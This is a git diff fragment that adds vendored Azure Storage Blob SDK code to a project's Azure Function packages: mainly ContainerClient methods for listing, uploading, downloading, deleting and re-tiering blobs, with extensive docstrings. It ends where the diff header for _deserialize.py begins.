+            character. The delimiter may be a single character or a string.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: An iterable (auto-paging) response of BlobProperties.
+        :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.BlobProperties]
+        """
+        if include and not isinstance(include, list):
+            include = [include]
+
+        results_per_page = kwargs.pop('results_per_page', None)
+        timeout = kwargs.pop('timeout', None)
+        command = functools.partial(
+            self._client.container.list_blob_hierarchy_segment,
+            delimiter=delimiter,
+            include=include,
+            timeout=timeout,
+            **kwargs)
+        return BlobPrefix(
+            command,
+            prefix=name_starts_with,
+            results_per_page=results_per_page,
+            delimiter=delimiter)
+
+    @distributed_trace
+    def find_blobs_by_tags(
+            self, filter_expression,  # type: str
+            **kwargs  # type: Optional[Any]
+        ):
+        # type: (...) -> ItemPaged[FilteredBlob]
+        """Returns a generator to list the blobs under the specified container whose tags
+        match the given search expression.
+        The generator will lazily follow the continuation tokens returned by
+        the service.
+
+        :param str filter_expression:
+            The expression to find blobs whose tags match the specified condition.
+            eg. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'"
+        :keyword int results_per_page:
+            The max result per page when paginating.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: An iterable (auto-paging) response of FilteredBlob.
+        :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.FilteredBlob]
+        """
+        results_per_page = kwargs.pop('results_per_page', None)
+        timeout = kwargs.pop('timeout', None)
+        command = functools.partial(
+            self._client.container.filter_blobs,
+            timeout=timeout,
+            where=filter_expression,
+            **kwargs)
+        return ItemPaged(
+            command, results_per_page=results_per_page,
+            page_iterator_class=FilteredBlobPaged)
+
+    @distributed_trace
+    def upload_blob(
+            self, name,  # type: Union[str, BlobProperties]
+            data,  # type: Union[Iterable[AnyStr], IO[AnyStr]]
+            blob_type=BlobType.BlockBlob,  # type: Union[str, BlobType]
+            length=None,  # type: Optional[int]
+            metadata=None,  # type: Optional[Dict[str, str]]
+            **kwargs
+        ):
+        # type: (...) -> BlobClient
+        """Creates a new blob from a data source with automatic chunking.
+
+        :param name: The blob with which to interact. If specified, this value will override
+            a blob value specified in the blob URL.
+        :type name: str or ~azure.storage.blob.BlobProperties
+        :param data: The blob data to upload.
+        :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be
+            either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob.
+        :param int length:
+            Number of bytes to read from the stream. This is optional, but
+            should be supplied for optimal performance.
+        :param metadata:
+            Name-value pairs associated with the blob as metadata.
+        :type metadata: dict(str, str)
+        :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data.
+            If True, upload_blob will overwrite the existing data. If set to False, the
+            operation will fail with ResourceExistsError.
+            The exception to the above is with Append
+            blob types: if set to False and the data already exists, an error will not be raised
+            and the data will be appended to the existing blob. If overwrite is set to True, then the existing
+            append blob will be deleted and a new one created. Defaults to False.
+        :keyword ~azure.storage.blob.ContentSettings content_settings:
+            ContentSettings object used to set blob properties. Used to set content type, encoding,
+            language, disposition, md5, and cache control.
+        :keyword bool validate_content:
+            If true, calculates an MD5 hash for each chunk of the blob. The storage
+            service checks the hash of the content that has arrived with the hash
+            that was sent. This is primarily valuable for detecting bitflips on
+            the wire if using http instead of https, as https (the default) will
+            already validate. Note that this MD5 hash is not stored with the
+            blob. Also note that if enabled, the memory-efficient upload algorithm
+            will not be used, because computing the MD5 hash requires buffering
+            entire blocks, and doing so defeats the purpose of the memory-efficient algorithm.
+        :keyword lease:
+            Required if the container has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds. This method may make
+            multiple calls to the Azure service and the timeout will apply to
+            each call individually.
+        :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier:
+            A page blob tier value to set the blob to. The tier correlates to the size of the
+            blob and number of allowed IOPS. This is only applicable to page blobs on
+            premium storage accounts.
+        :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier:
+            A standard blob tier value to set the blob to. For this version of the library,
+            this is only applicable to block blobs on standard storage accounts.
+        :keyword int maxsize_condition:
+            Optional conditional header. The max length in bytes permitted for
+            the append blob.
+            If the Append Block operation would cause the blob
+            to exceed that limit or if the blob size is already greater than the
+            value specified in this header, the request will fail with
+            MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed).
+        :keyword int max_concurrency:
+            Maximum number of parallel connections to use when the blob size exceeds
+            64MB.
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword str encryption_scope:
+            A predefined encryption scope used to encrypt the data on the service. An encryption
+            scope can be created using the Management API and referenced here by name. If a default
+            encryption scope has been defined at the container, this value will override it if the
+            container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+            .. versionadded:: 12.2.0
+
+        :keyword str encoding:
+            Defaults to UTF-8.
+        :keyword progress_hook:
+            A callback to track the progress of a long running upload. The signature is
+            function(current: int, total: Optional[int]) where current is the number of bytes transferred
+            so far, and total is the size of the blob or None if the size is unknown.
+        :paramtype progress_hook: Callable[[int, Optional[int]], None]
+        :returns: A BlobClient to interact with the newly uploaded blob.
+        :rtype: ~azure.storage.blob.BlobClient
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_containers.py
+                :start-after: [START upload_blob_to_container]
+                :end-before: [END upload_blob_to_container]
+                :language: python
+                :dedent: 8
+                :caption: Upload blob to the container.
+        """
+        blob = self.get_blob_client(name)
+        kwargs.setdefault('merge_span', True)
+        timeout = kwargs.pop('timeout', None)
+        encoding = kwargs.pop('encoding', 'UTF-8')
+        blob.upload_blob(
+            data,
+            blob_type=blob_type,
+            length=length,
+            metadata=metadata,
+            timeout=timeout,
+            encoding=encoding,
+            **kwargs
+        )
+        return blob
+
+    @distributed_trace
+    def delete_blob(
+            self, blob,  # type: Union[str, BlobProperties]
+            delete_snapshots=None,  # type: Optional[str]
+            **kwargs
+        ):
+        # type: (...) -> None
+        """Marks the specified blob or snapshot for deletion.
+
+        The blob is later deleted during garbage collection.
+        Note that in order to delete a blob, you must delete all of its
+        snapshots. You can delete both at the same time with the delete_blob
+        operation.
+
+        If a delete retention policy is enabled for the service, then this operation soft deletes the blob or snapshot
+        and retains the blob or snapshot for the specified number of days.
+        After the specified number of days, the blob's data is removed from the service during garbage collection.
+        A soft-deleted blob or snapshot is accessible through :func:`list_blobs()` by specifying the
+        `include=["deleted"]` option, and can be restored using :func:`~BlobClient.undelete()`.
+
+        :param blob: The blob with which to interact. If specified, this value will override
+            a blob value specified in the blob URL.
+        :type blob: str or ~azure.storage.blob.BlobProperties
+        :param str delete_snapshots:
+            Required if the blob has associated snapshots. Values include:
+            - "only": Deletes only the blob's snapshots.
+            - "include": Deletes the blob along with all snapshots.
+ :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + blob_client = self.get_blob_client(blob) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + blob_client.delete_blob( # type: ignore + delete_snapshots=delete_snapshots, + timeout=timeout, + **kwargs) + + @distributed_trace + def download_blob(self, blob, offset=None, length=None, **kwargs): + # type: (Union[str, BlobProperties], Optional[int], Optional[int], **Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an iterator which allows the user to iterate over the content in chunks. + + :param blob: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob: str or ~azure.storage.blob.BlobProperties + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. 
This is primarily valuable for detecting bitflips on
+            the wire if using http instead of https, as https (the default) will
+            already validate. Note that this MD5 hash is not stored with the
+            blob. Also note that if enabled, the memory-efficient algorithm
+            will not be used because computing the MD5 hash requires buffering
+            entire blocks, and doing so defeats the purpose of the memory-efficient algorithm.
+        :keyword lease:
+            Required if the blob has an active lease. If specified, download_blob only
+            succeeds if the blob's lease is active and matches this ID. Value can be a
+            BlobLeaseClient object or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword int max_concurrency:
+            The number of parallel connections with which to download.
+        :keyword str encoding:
+            Encoding to decode the downloaded bytes. Default is None, i.e. no decoding.
+        :keyword progress_hook:
+            A callback to track the progress of a long running download. The signature is
+            function(current: int, total: int) where current is the number of bytes transferred
+            so far, and total is the total size of the download.
+        :paramtype progress_hook: Callable[[int, int], None]
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds. This method may make
+            multiple calls to the Azure service and the timeout will apply to
+            each call individually.
+        :returns: A streaming object (StorageStreamDownloader)
+        :rtype: ~azure.storage.blob.StorageStreamDownloader
+        """
+        blob_client = self.get_blob_client(blob)  # type: ignore
+        kwargs.setdefault('merge_span', True)
+        return blob_client.download_blob(offset=offset, length=length, **kwargs)
+
+    def _generate_delete_blobs_subrequest_options(
+            self, snapshot=None,
+            delete_snapshots=None,
+            lease_access_conditions=None,
+            modified_access_conditions=None,
+            **kwargs
+        ):
+        """This code is a copy from _generated.
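+
+        Illustrative note (hypothetical values): given modified access conditions
+        carrying if_match='"0x8D0"', the header parameters built below include
+        {'If-Match': '"0x8D0"'}; a lease id likewise maps to 'x-ms-lease-id'.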
+ + Once Autorest is able to provide request preparation this code should be removed. + """ + lease_id = None + if lease_access_conditions is not None: + lease_id = lease_access_conditions.lease_id + if_modified_since = None + if modified_access_conditions is not None: + if_modified_since = modified_access_conditions.if_modified_since + if_unmodified_since = None + if modified_access_conditions is not None: + if_unmodified_since = modified_access_conditions.if_unmodified_since + if_match = None + if modified_access_conditions is not None: + if_match = modified_access_conditions.if_match + if_none_match = None + if modified_access_conditions is not None: + if_none_match = modified_access_conditions.if_none_match + if_tags = None + if modified_access_conditions is not None: + if_tags = modified_access_conditions.if_tags + + # Construct parameters + timeout = kwargs.pop('timeout', None) + query_parameters = {} + if snapshot is not None: + query_parameters['snapshot'] = self._client._serialize.query("snapshot", snapshot, 'str') # pylint: disable=protected-access + if timeout is not None: + query_parameters['timeout'] = self._client._serialize.query("timeout", timeout, 'int', minimum=0) # pylint: disable=protected-access + + # Construct headers + header_parameters = {} + if delete_snapshots is not None: + header_parameters['x-ms-delete-snapshots'] = self._client._serialize.header( # pylint: disable=protected-access + "delete_snapshots", delete_snapshots, 'DeleteSnapshotsOptionType') + if lease_id is not None: + header_parameters['x-ms-lease-id'] = self._client._serialize.header( # pylint: disable=protected-access + "lease_id", lease_id, 'str') + if if_modified_since is not None: + header_parameters['If-Modified-Since'] = self._client._serialize.header( # pylint: disable=protected-access + "if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + header_parameters['If-Unmodified-Since'] = self._client._serialize.header( # pylint: disable=protected-access + "if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + header_parameters['If-Match'] = self._client._serialize.header( # pylint: disable=protected-access + "if_match", if_match, 'str') + if if_none_match is not None: + header_parameters['If-None-Match'] = self._client._serialize.header( # pylint: disable=protected-access + "if_none_match", if_none_match, 'str') + if if_tags is not None: + header_parameters['x-ms-if-tags'] = self._client._serialize.header("if_tags", if_tags, 'str') # pylint: disable=protected-access + + return query_parameters, header_parameters + + def _generate_delete_blobs_options(self, + *blobs, # type: List[Union[str, BlobProperties, dict]] + **kwargs + ): + timeout = kwargs.pop('timeout', None) + raise_on_any_failure = kwargs.pop('raise_on_any_failure', True) + delete_snapshots = kwargs.pop('delete_snapshots', None) + if_modified_since = kwargs.pop('if_modified_since', None) + if_unmodified_since = kwargs.pop('if_unmodified_since', None) + if_tags_match_condition = kwargs.pop('if_tags_match_condition', None) + kwargs.update({'raise_on_any_failure': raise_on_any_failure, + 'sas': self._query_str.replace('?', '&'), + 'timeout': '&timeout=' + str(timeout) if timeout else "", + 'path': self.container_name, + 'restype': 'restype=container&' + }) + + reqs = [] + for blob in blobs: + blob_name = _get_blob_name(blob) + container_name = self.container_name + + try: + options = BlobClient._generic_delete_blob_options( # pylint: disable=protected-access + 
snapshot=blob.get('snapshot'),
+                    delete_snapshots=delete_snapshots or blob.get('delete_snapshots'),
+                    lease=blob.get('lease_id'),
+                    if_modified_since=if_modified_since or blob.get('if_modified_since'),
+                    if_unmodified_since=if_unmodified_since or blob.get('if_unmodified_since'),
+                    etag=blob.get('etag'),
+                    if_tags_match_condition=if_tags_match_condition or blob.get('if_tags_match_condition'),
+                    match_condition=blob.get('match_condition') or MatchConditions.IfNotModified if blob.get('etag')
+                    else None,
+                    timeout=blob.get('timeout'),
+                )
+            except AttributeError:
+                options = BlobClient._generic_delete_blob_options(  # pylint: disable=protected-access
+                    delete_snapshots=delete_snapshots,
+                    if_modified_since=if_modified_since,
+                    if_unmodified_since=if_unmodified_since,
+                    if_tags_match_condition=if_tags_match_condition
+                )
+
+            query_parameters, header_parameters = self._generate_delete_blobs_subrequest_options(**options)
+
+            req = HttpRequest(
+                "DELETE",
+                "/{}/{}{}".format(quote(container_name), quote(blob_name, safe='/~'), self._query_str),
+                headers=header_parameters
+            )
+            req.format_parameters(query_parameters)
+            reqs.append(req)
+
+        return reqs, kwargs
+
+    @distributed_trace
+    def delete_blobs(self, *blobs, **kwargs):
+        # type: (...) -> Iterator[HttpResponse]
+        """Marks the specified blobs or snapshots for deletion.
+
+        The blobs are later deleted during garbage collection.
+        Note that in order to delete blobs, you must delete all of their
+        snapshots. You can delete both at the same time with the delete_blobs operation.
+
+        If a delete retention policy is enabled for the service, then this operation soft deletes the blobs or
+        snapshots and retains the blobs or snapshots for the specified number of days.
+        After the specified number of days, the blobs' data is removed from the service during garbage collection.
+        Soft-deleted blobs or snapshots are accessible through :func:`list_blobs()` by specifying the
+        `include=["deleted"]` option, and can be restored using :func:`~BlobClient.undelete()`.
+
+        The maximum number of blobs that can be deleted in a single request is 256.
+
+        :param blobs:
+            The blobs to delete. This can be a single blob, or multiple values can
+            be supplied, where each value is either the name of the blob (str) or BlobProperties.
+
+            .. note::
+                When the blob type is dict, here's a list of keys, value rules.
+
+                blob name:
+                    key: 'name', value type: str
+                snapshot you want to delete:
+                    key: 'snapshot', value type: str
+                whether to delete snapshots when deleting the blob:
+                    key: 'delete_snapshots', value: 'include' or 'only'
+                whether the blob has been modified or not:
+                    key: 'if_modified_since', 'if_unmodified_since', value type: datetime
+                etag:
+                    key: 'etag', value type: str
+                whether to match the etag or not:
+                    key: 'match_condition', value type: MatchConditions
+                tags match condition:
+                    key: 'if_tags_match_condition', value type: str
+                lease:
+                    key: 'lease_id', value type: Union[str, LeaseClient]
+                timeout for subrequest:
+                    key: 'timeout', value type: int
+
+        :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties]
+        :keyword str delete_snapshots:
+            Required if a blob has associated snapshots. Values include:
+            - "only": Deletes only the blob's snapshots.
+            - "include": Deletes the blob along with all snapshots.
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+ Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: An iterator of responses, one for each blob in order + :rtype: Iterator[~azure.core.pipeline.transport.HttpResponse] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START delete_multiple_blobs] + :end-before: [END delete_multiple_blobs] + :language: python + :dedent: 8 + :caption: Deleting multiple blobs. + """ + if len(blobs) == 0: + return iter(list()) + + reqs, options = self._generate_delete_blobs_options(*blobs, **kwargs) + + return self._batch_send(*reqs, **options) + + def _generate_set_tiers_subrequest_options( + self, tier, snapshot=None, version_id=None, rehydrate_priority=None, lease_access_conditions=None, **kwargs + ): + """This code is a copy from _generated. + + Once Autorest is able to provide request preparation this code should be removed. 
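+
+        Illustrative note (hypothetical values): a call with tier='Cool' and a lease
+        id yields query parameters including {'comp': 'tier'} and headers including
+        {'x-ms-access-tier': 'Cool', 'x-ms-lease-id': '<id>'}.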
+ """ + if not tier: + raise ValueError("A blob tier must be specified") + if snapshot and version_id: + raise ValueError("Snapshot and version_id cannot be set at the same time") + if_tags = kwargs.pop('if_tags', None) + + lease_id = None + if lease_access_conditions is not None: + lease_id = lease_access_conditions.lease_id + + comp = "tier" + timeout = kwargs.pop('timeout', None) + # Construct parameters + query_parameters = {} + if snapshot is not None: + query_parameters['snapshot'] = self._client._serialize.query("snapshot", snapshot, 'str') # pylint: disable=protected-access + if version_id is not None: + query_parameters['versionid'] = self._client._serialize.query("version_id", version_id, 'str') # pylint: disable=protected-access + if timeout is not None: + query_parameters['timeout'] = self._client._serialize.query("timeout", timeout, 'int', minimum=0) # pylint: disable=protected-access + query_parameters['comp'] = self._client._serialize.query("comp", comp, 'str') # pylint: disable=protected-access, specify-parameter-names-in-call + + # Construct headers + header_parameters = {} + header_parameters['x-ms-access-tier'] = self._client._serialize.header("tier", tier, 'str') # pylint: disable=protected-access, specify-parameter-names-in-call + if rehydrate_priority is not None: + header_parameters['x-ms-rehydrate-priority'] = self._client._serialize.header( # pylint: disable=protected-access + "rehydrate_priority", rehydrate_priority, 'str') + if lease_id is not None: + header_parameters['x-ms-lease-id'] = self._client._serialize.header("lease_id", lease_id, 'str') # pylint: disable=protected-access + if if_tags is not None: + header_parameters['x-ms-if-tags'] = self._client._serialize.header("if_tags", if_tags, 'str') # pylint: disable=protected-access + + return query_parameters, header_parameters + + def _generate_set_tiers_options(self, + blob_tier, # type: Optional[Union[str, StandardBlobTier, PremiumPageBlobTier]] + *blobs, # type: List[Union[str, BlobProperties, dict]] + **kwargs + ): + timeout = kwargs.pop('timeout', None) + raise_on_any_failure = kwargs.pop('raise_on_any_failure', True) + rehydrate_priority = kwargs.pop('rehydrate_priority', None) + if_tags = kwargs.pop('if_tags_match_condition', None) + kwargs.update({'raise_on_any_failure': raise_on_any_failure, + 'sas': self._query_str.replace('?', '&'), + 'timeout': '&timeout=' + str(timeout) if timeout else "", + 'path': self.container_name, + 'restype': 'restype=container&' + }) + + reqs = [] + for blob in blobs: + blob_name = _get_blob_name(blob) + container_name = self.container_name + + try: + tier = blob_tier or blob.get('blob_tier') + query_parameters, header_parameters = self._generate_set_tiers_subrequest_options( + tier=tier, + snapshot=blob.get('snapshot'), + version_id=blob.get('version_id'), + rehydrate_priority=rehydrate_priority or blob.get('rehydrate_priority'), + lease_access_conditions=blob.get('lease_id'), + if_tags=if_tags or blob.get('if_tags_match_condition'), + timeout=timeout or blob.get('timeout') + ) + except AttributeError: + query_parameters, header_parameters = self._generate_set_tiers_subrequest_options( + blob_tier, rehydrate_priority=rehydrate_priority, if_tags=if_tags) + + req = HttpRequest( + "PUT", + "/{}/{}{}".format(quote(container_name), quote(blob_name, safe='/~'), self._query_str), + headers=header_parameters + ) + req.format_parameters(query_parameters) + reqs.append(req) + + return reqs, kwargs + + @distributed_trace + def set_standard_blob_tier_blobs( + self, + 
standard_blob_tier,  # type: Optional[Union[str, StandardBlobTier]]
+            *blobs,  # type: List[Union[str, BlobProperties, dict]]
+            **kwargs
+        ):
+        # type: (...) -> Iterator[HttpResponse]
+        """This operation sets the tier on block blobs.
+
+        A block blob's tier determines Hot/Cool/Archive storage type.
+        This operation does not update the blob's ETag.
+
+        The maximum number of blobs that can be updated in a single request is 256.
+
+        :param standard_blob_tier:
+            Indicates the tier to be set on all blobs. Options include 'Hot', 'Cool',
+            'Archive'. The hot tier is optimized for storing data that is accessed
+            frequently. The cool storage tier is optimized for storing data that
+            is infrequently accessed and stored for at least a month. The archive
+            tier is optimized for storing data that is rarely accessed and stored
+            for at least six months with flexible latency requirements.
+
+            .. note::
+                If you want to set different tier on different blobs please set this positional parameter to None.
+                Then the blob tier on every BlobProperties will be taken.
+
+        :type standard_blob_tier: str or ~azure.storage.blob.StandardBlobTier
+        :param blobs:
+            The blobs with which to interact. This can be a single blob, or multiple values can
+            be supplied, where each value is either the name of the blob (str) or BlobProperties.
+
+            .. note::
+                When the blob type is dict, here's a list of keys, value rules.
+
+                blob name:
+                    key: 'name', value type: str
+                standard blob tier:
+                    key: 'blob_tier', value type: StandardBlobTier
+                rehydrate priority:
+                    key: 'rehydrate_priority', value type: RehydratePriority
+                lease:
+                    key: 'lease_id', value type: Union[str, LeaseClient]
+                snapshot:
+                    key: "snapshot", value type: str
+                version id:
+                    key: "version_id", value type: str
+                tags match condition:
+                    key: 'if_tags_match_condition', value type: str
+                timeout for subrequest:
+                    key: 'timeout', value type: int
+
+        :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties]
+        :keyword ~azure.storage.blob.RehydratePriority rehydrate_priority:
+            Indicates the priority with which to rehydrate an archived blob.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :keyword bool raise_on_any_failure:
+            This is a boolean param which defaults to True. When this is set, an exception
+            is raised even if there is a single operation failure.
+        :return: An iterator of responses, one for each blob in order
+        :rtype: Iterator[~azure.core.pipeline.transport.HttpResponse]
+        """
+        reqs, options = self._generate_set_tiers_options(standard_blob_tier, *blobs, **kwargs)
+
+        return self._batch_send(*reqs, **options)
+
+    @distributed_trace
+    def set_premium_page_blob_tier_blobs(
+            self,
+            premium_page_blob_tier,  # type: Optional[Union[str, PremiumPageBlobTier]]
+            *blobs,  # type: List[Union[str, BlobProperties, dict]]
+            **kwargs
+        ):
+        # type: (...) -> Iterator[HttpResponse]
+        """Sets the page blob tiers on all blobs. This API is only supported for page blobs on premium accounts.
+
+        The maximum number of blobs that can be updated in a single request is 256.
+
+        :param premium_page_blob_tier:
+            A page blob tier value to set the blob to. The tier correlates to the size of the
+            blob and number of allowed IOPS. This is only applicable to page blobs on
+            premium storage accounts.
+
+            .. 
note:: + If you want to set different tier on different blobs please set this positional parameter to None. + Then the blob tier on every BlobProperties will be taken. + + :type premium_page_blob_tier: ~azure.storage.blob.PremiumPageBlobTier + :param blobs: + The blobs with which to interact. This can be a single blob, or multiple values can + be supplied, where each value is either the name of the blob (str) or BlobProperties. + + .. note:: + When the blob type is dict, here's a list of keys, value rules. + + blob name: + key: 'name', value type: str + premium blob tier: + key: 'blob_tier', value type: PremiumPageBlobTier + lease: + key: 'lease_id', value type: Union[str, LeaseClient] + timeout for subrequest: + key: 'timeout', value type: int + + :type blobs: list[str], list[dict], or list[~azure.storage.blob.BlobProperties] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :keyword bool raise_on_any_failure: + This is a boolean param which defaults to True. When this is set, an exception + is raised even if there is a single operation failure. + :return: An iterator of responses, one for each blob in order + :rtype: iterator[~azure.core.pipeline.transport.HttpResponse] + """ + reqs, options = self._generate_set_tiers_options(premium_page_blob_tier, *blobs, **kwargs) + + return self._batch_send(*reqs, **options) + + def get_blob_client( + self, blob, # type: Union[str, BlobProperties] + snapshot=None # type: str + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. + + :param blob: + The blob with which to interact. + :type blob: str or ~azure.storage.blob.BlobProperties + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`~BlobClient.create_snapshot()`. + :returns: A BlobClient. + :rtype: ~azure.storage.blob.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers.py + :start-after: [START get_blob_client] + :end-before: [END get_blob_client] + :language: python + :dedent: 8 + :caption: Get the blob client. + """ + blob_name = _get_blob_name(blob) + _pipeline = Pipeline( + transport=TransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( + self.url, container_name=self.container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_deserialize.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_deserialize.py new file mode 100644 index 0000000..fbb5e77 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_deserialize.py @@ -0,0 +1,174 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. 
